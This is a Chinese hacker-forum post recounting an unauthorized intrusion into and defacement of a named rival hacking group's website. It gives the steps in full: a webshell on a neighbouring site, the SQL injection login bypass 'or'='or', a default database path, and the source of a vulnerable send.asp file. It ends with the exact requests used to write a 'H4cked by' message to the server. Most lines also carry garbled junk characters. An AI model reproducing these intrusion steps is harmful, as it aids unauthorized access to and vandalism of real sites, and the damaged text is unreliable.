|
|
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量
0 i2 ~$ F* A1 M; W4 o7 }今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程0 ?: g/ ~0 y! W$ l v
这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来
2 L; i4 m+ G0 G- @我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东6 R8 f$ X R& t/ } Y% U
首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的; a X0 ~( m, {3 d M8 A
服务器应该防ARP,不过这还只是猜测
( Q8 i8 m% T8 c8 k0 g云中鸡说先不搞C段,PZ一下再说0 X6 @2 z3 N1 b% Y0 H. N5 i: F/ l. v
然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]2 ^7 H) K3 e. f6 u% ^3 M1 D
一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............6 G# E- i A4 W+ z @
这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell
4 [3 |% O m8 m4 U6 Q我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT
- R& Y2 R# h! @+ y/ \* E. Z1 {然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn- i5 f" H2 u' L$ _. B# A
看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟
% U* {/ q! [6 s8 P' u% l1 d问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............
, A' p9 f) Q* k% Z无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~' p. O J: d- u b- J/ b
然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么
9 _$ {6 t& e( ~3 v% f6 o打开一看,如图1所示。5 Q7 \3 _5 S9 }/ ?& K7 k
1 o7 Y% Q' |+ F" n: h0 H
http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg) D% k8 D% v8 b# ?3 Q
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
+ ~. h& {" |# \
6 [$ h9 a$ R, z* W" \# s http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg* C& h% K0 R4 ^- {' I, }2 _! H
太帅了,真YD!!
5 A! M1 W5 i3 @2 D( L# d这个页面应该是一套个人主页程序,而且还挺炫的!3 l( _- `! P( u) P* Y/ ]& r
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
- [, i( {, M6 P0 P: Y1 H
3 {5 V5 V4 w+ a http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg/ {: V2 \& F I+ n" T! Q }
嘿嘿,试着'or'='or'居然进去了!!如图4所示。2 T" A$ R& f" ]& w' k( V7 l
- I6 t/ h# v/ E
http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg: ^+ v! x" M$ i* [* h
经过半个多小时的摸索,还是没有发现可利用的地方。
( s) k9 N0 Z! ]: }5 D这下郁闷了,不管了,把这套程序下载下来看看吧# V" r. e( p# @2 a8 @% O
找了一会才知道这套程序叫做“V时代个人flash主页” ^. i3 r* t- g& u
到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用
6 T3 u0 c/ q0 l0 p& [1 P* U( l于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]
' x) p( {: y' X, o$ v2 W2 {返回的确实找不到页面,郁闷了,输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]9 u+ ?5 e7 \6 a6 S& V" Y- G; w0 D
同样是找不到页面,真晕!再看看!# @+ p+ [5 X" w( t: A
5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!# f! t% m4 S9 s/ E
马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!
( ?5 y `1 V; a7 y+ |打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了! l2 n8 B/ X5 z6 K! A6 U4 x
希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:
7 h- u4 O- m' i! ]) p6 Z% s9 u% [7 G0 o* W/ H, I
var a! D1 v& i" ^6 X2 ^/ H1 |
var b2 }* b! |8 U& G0 w; ^
var tx
3 F5 S# a0 e; \! X8 y, Wvar clean$ o& _* Y7 h" K
a=Request("re")
! \ ?6 t0 h4 Mclean=Request("clean")
3 L# d9 @) A7 X: Evar jian="test.txt"
6 A# l; L* R0 a* @
0 a( P# F+ R: [3 t9 a/ F8 }$ H; @if(clean==1){( a7 Q) X7 f. r% I. O9 l6 F
tx="&a="
8 v) i$ ^1 p' `6 kvar fs2; I5 ^" L# _6 T8 V6 i* M+ E
var fs2=Server.CreateObject("Scripting.FileSystemObject")
* p5 m: j |$ ^" ^var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)- ?5 p" j1 m. g$ c2 p
newdt.WriteLine("&a=")
% u% s3 Y8 y6 g' |0 Hnewdt.close()
# `6 e# }# H4 i2 M' j: E3 W}
: S& u6 v! ?* r; |8 w# x+ j& L' W* L
if(clean==0|clean==1){/ Z% a9 b/ }. ~6 u3 z* L2 F
tx=""
; M5 q# Y+ s0 F1 W, zvar fso = Server.Createobject("Scripting.FileSystemObject")" P( m: X! k% R& N8 g3 v5 a
var file = fso.OpenTextFile(Server.Mappath(jian))
' m. g( R# T1 J) J% r; pwhile (!file.AtEndOfStream){
, b! g5 w# Z V4 U/ d9 ntx=file.ReadLine()
3 K" R3 P/ b9 H# @! C$ v+ p8 G" nResponse.write (tx); W, L# A+ r! s$ O6 {" |0 ?1 c
}3 E! F% f- `* m) @0 P2 a1 E3 K
Response.write ("&")& I2 M5 i& m3 P! A
file.close()& y" ]1 t. s, c n! t
}- C( L1 r" o0 }) _2 q
B4 R% O' C$ p! c6 W" W/ pif(clean==2){
+ Q2 e7 ]7 N6 P- s$ r# }7 Ltx=""
) t" u) s8 g0 v9 avar fso = Server.Createobject("Scripting.FileSystemObject")
- |3 k. m/ h! b8 |8 |8 M& @7 nvar file = fso.OpenTextFile(Server.Mappath(jian)), _4 F, Z" ~) L1 B: ]% ~& O
8 T2 ^% @( l \3 p9 Uvar fs2
5 p; Q4 ~: K: M9 f" hvar fs2=Server.CreateObject("Scripting.FileSystemObject")
. u. x. I! Q( c ^" u+ l1 T) Fvar newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)8 k8 N4 U* r } H+ i
: ]8 h- X- W' g4 O9 p
, l: B9 Q* T: c: w6 N1 [* wwhile (!file.AtEndOfStream){6 C% h5 q; X6 s
tx=file.ReadLine()/ `8 M7 |; c1 M" p
Response.write (tx)}
1 y( D$ v; Q/ A9 ?6 P' U* m9 v& l# e- c. L
Response.write (a+"&"): J& G3 Q: u& D+ r
newdt.WriteLine(a)2 g' z+ _1 P) X8 \% l, |
' G/ O: [# Y, k2 M" ^9 S; E8 ]
file.close()& x" c8 j2 {. a2 \
newdt.close()% O( m, }. n; W' l/ l
}3 l: L* n2 q/ E
2 L8 V8 G7 X# w' L! U
/ l! j, i8 p1 K3 Q* ?9 z复制代码
7 w- @( U6 J" y+ }这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”. h& N2 Q( M: H8 Y1 C* c% _
接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”) f7 s# B) o* _- y- Q' r" [
这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话' W& O# |1 G! C
过程如图5、6所示。# g+ c0 j2 s. f2 h) W0 \7 D. o
/ R8 `0 u& `% u) Z0 L- R# K8 jhttp://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg& [% v7 X! s6 \3 _2 u4 e0 f: C
* c9 T2 }% _5 K2 s( o2 u0 h! k4 j http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg
1 s6 X$ C* d: ?. s+ ^! m0 H提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。# t0 U6 _0 A5 M0 ]' ?' J( f0 E
) `5 h3 ~0 @" _! g/ ~& S: e
http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg
1 o6 I# G+ a$ @; R+ ^5 O: r' i& \这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的6 }7 X' k! {/ w5 B3 ~
如果jian是经过request取值的话,同样也能搞到shell。2 y+ m5 F' D. ^' T" g/ S x8 u
这次只是装到了X,并没有拿到shell
) m, z1 _; }- p( p已经是凌晨了,跟云中J说了声就睡觉去鸟! ?% V, B0 f+ ?
估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙# j8 i; n0 o# m: c6 H- c
就到这里吧,没技术含量,纯粹装X,高手们见笑了; ^# g% m" g$ X1 \3 \. J
另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己
& v9 E9 y! M: n% i" f0 @自己学不到技术,却还在自欺欺人
: R% Q# X' b4 q# H不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~+ w' [& @1 e' l4 T2 a: Z0 p
6 A6 B, u b' S( s |
|